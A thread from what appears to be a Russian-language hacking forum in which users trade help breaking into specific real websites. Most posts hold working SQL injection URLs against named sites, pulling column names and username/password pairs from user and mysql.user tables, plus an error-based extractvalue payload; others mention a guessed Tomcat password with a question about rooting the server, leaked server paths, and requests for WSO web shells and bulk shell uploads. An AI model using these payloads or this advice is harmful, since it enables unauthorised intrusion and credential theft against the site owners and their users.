10.03.2014, 02:35
|
|
Познающий
Регистрация: 04.03.2013
Сообщений: 62
С нами:
6943286
Репутация:
-3
|
|
kompromat.flb.ru/material1.phtml?id=-153+union+select+1,2,3 ,4,5,6,7,8,9,10,11+--+
Не могу найти путь к корню сайта
|
|
|
10.03.2014, 04:26
|
|
Участник форума
Регистрация: 07.09.2013
Сообщений: 173
С нами:
6674006
Репутация:
19
|
|
Сообщение от Win32BOT
kompromat.flb.ru/material1.phtml?id=-153+union+select+1,2,3 ,4,5,6,7,8,9,10,11+--+
Не могу найти путь к корню сайта
Я пошел по пути родителя, хотя он уже и на другом сервере: http://flb.ru/user_config.php
"Fatal error: Class 'User' not found in /var/www/flb.ru/user_config.php on line 10"
В гуглкеш нашлось такое:
"Warning: mysql_connect() [function.mysql-connect]: Can't connect to MySQL server on '95.211.1.162' (4) in /home/u475266731/public_html/portal-object/db/dbconnect.obj.php on line 45"
В общем, я бы посоветовал ковырять в сторону соседей.
|
|
|
|
10.03.2014, 20:46
|
|
Постоянный
Регистрация: 17.09.2011
Сообщений: 390
С нами:
7712246
Репутация:
23
|
|
PHP код:
[COLOR="#000000"][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//agfmpack.ru/page/92'/[/COLOR][/COLOR]
Кто знает как раскрутить? |
|
|
|
11.03.2014, 19:04
|
|
Познающий
Регистрация: 20.10.2010
Сообщений: 52
С нами:
8190326
Репутация:
0
|
|
Подобрал пароль от Apache Tomcat/7.0.47
Что можно там сделать? Есть ли способ порутать сервак полностью?
|
|
|
|
12.03.2014, 14:59
|
|
Новичок
Регистрация: 07.09.2011
Сообщений: 20
С нами:
7726646
Репутация:
0
|
|
Проблемка
есть таблица user
узнаем колонки
http://www.yulsun.ru/index.php?katalog=s454e435&tipavto=1&setmanuf=579& setmod=7967&settyp=30716&shgruptov=-8+union+select+1,2,group_concat(column_name),4,5+f rom+information_schema.columns+where+table_name=0x 75736572+--+
Далее делаю
http://www.yulsun.ru/index.php?katalog=s454e435&tipavto=1&setmanuf=579& setmod=7967&settyp=30716&shgruptov=-8+union+select+1,2,group_concat(User,0x3b,Password ),4,5+from+user+--+
И результат: ПУСТОТА!
Need help!
|
|
|
|
12.03.2014, 15:08
|
|
Постоянный
Регистрация: 10.06.2011
Сообщений: 939
С нами:
7854806
Репутация:
173
|
|
Сообщение от AHTNkiller
Проблемка
есть таблица user
узнаем колонки
http://www.yulsun.ru/index.php?katalog=s454e435&tipavto=1&setmanuf=579& setmod=7967&settyp=30716&shgruptov=-8+union+select+1,2,group_concat(column_name),4,5+f rom+information_schema.columns+where+table_name=0x 75736572+--+
Далее делаю
http://www.yulsun.ru/index.php?katalog=s454e435&tipavto=1&setmanuf=579& setmod=7967&settyp=30716&shgruptov=-8+union+select+1,2,group_concat(User,0x3b,Password ),4,5+from+user+--+
И результат: ПУСТОТА!
Need help!
укажи с какой БД хочешь вытащить, например mysql
http://www.yulsun.ru/index.php?katalog=s454e435&tipavto=1&setmanuf=579& setmod=7967&settyp=30716&shgruptov=-8+union+select+1,2,group_concat%28User,0x3b,Passwo rd%29,4,5+from+mysql.user--
список БД
Сообщение от None
http://www.yulsun.ru/index.php?katalog=s454e435&tipavto=1&setmanuf=579& setmod=7967&settyp=30716&shgruptov=-8+union+select+1,2,schema_name,4,5+from+informatio n_schema.schemata--
|
|
|
|
12.03.2014, 17:41
|
|
Новичок
Регистрация: 12.02.2013
Сообщений: 21
С нами:
6972086
Репутация:
0
|
|
Парни помогите ответить на вопросы,если можно на примерах!
Сообщение от CoolHucker
1.Откуда берут шеллы для слива трафика?
2.Киньте ссылку на актуальную версию WSO
3.Если сначало ищут ресурс,потом сканят,потом ломают-получают доступ-заливают шелл(откуда берут русурс?С неба он не падает)
4.Если лить шеллы пачками как это делать?
Если кто-то всё это знает,помогите,Не обижу |
|
|
|
12.03.2014, 17:46
|
|
Познавший АНТИЧАТ
Регистрация: 12.07.2010
Сообщений: 1,546
С нами:
8334326
Репутация:
75
|
|
Сообщение от CoolHucker
Парни помогите ответить на вопросы,если можно на примерах!
Если кто-то всё это знает,помогите,Не обижу
Сообщение от CoolHucker
1.Откуда берут шеллы для слива трафика?
сам понял что спросил?
Сообщение от CoolHucker
2.Киньте ссылку на актуальную версию WSO
тебя в гугле забанили?
Сообщение от CoolHucker
3.Если сначало ищут ресурс,потом сканят,потом ломают-получают доступ-заливают шелл(откуда берут русурс?С неба он не падает)
омг, ты реально такой тупой или шутишь? в гугл вбиваешь слово лох и вот тебе куча ресурсов
Сообщение от CoolHucker
4.Если лить шеллы пачками как это делать?
руками блэть
Сообщение от OxoTnik
укажи с какой БД хочешь вытащить, например mysql
http://www.yulsun.ru/index.php?katalog=s454e435&tipavto=1&setmanuf=579& setmod=7967&settyp=30716&shgruptov=-8+union+select+1,2,group_concat%28User,0x3b,Passwo rd%29,4,5+from+mysql.user--
список БД
та не, нефига)) если бы была выбрана не та БД то написало бы ошибку, нужно вывод взять в substr
|
|
|
|
13.03.2014, 17:35
|
|
Постоянный
Регистрация: 22.11.2010
Сообщений: 545
С нами:
8142806
Репутация:
324
|
|
deleted
|
|
|
|
13.03.2014, 17:43
|
|
Постоянный
Регистрация: 30.05.2012
Сообщений: 600
С нами:
7343606
Репутация:
652
|
|
Сообщение от psihoz26
Помогите раскрутить
Кавычку в начале поставил для вывода ошибки.
Вместо сортировки по столбцам сортируется по словам из сообщений под фото.
Запрос обрезается таким набором символов - %00+--+
Код:
http://%host%/az/search/?query='1+IN+STRING+MODE%29+order+by+150%00+--+
%host% =photo.trend.az
....
Сообщение от None
query=1'*(extractvalue(1,concat(0x3a,verSion())))* '&x=0&y=0
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид
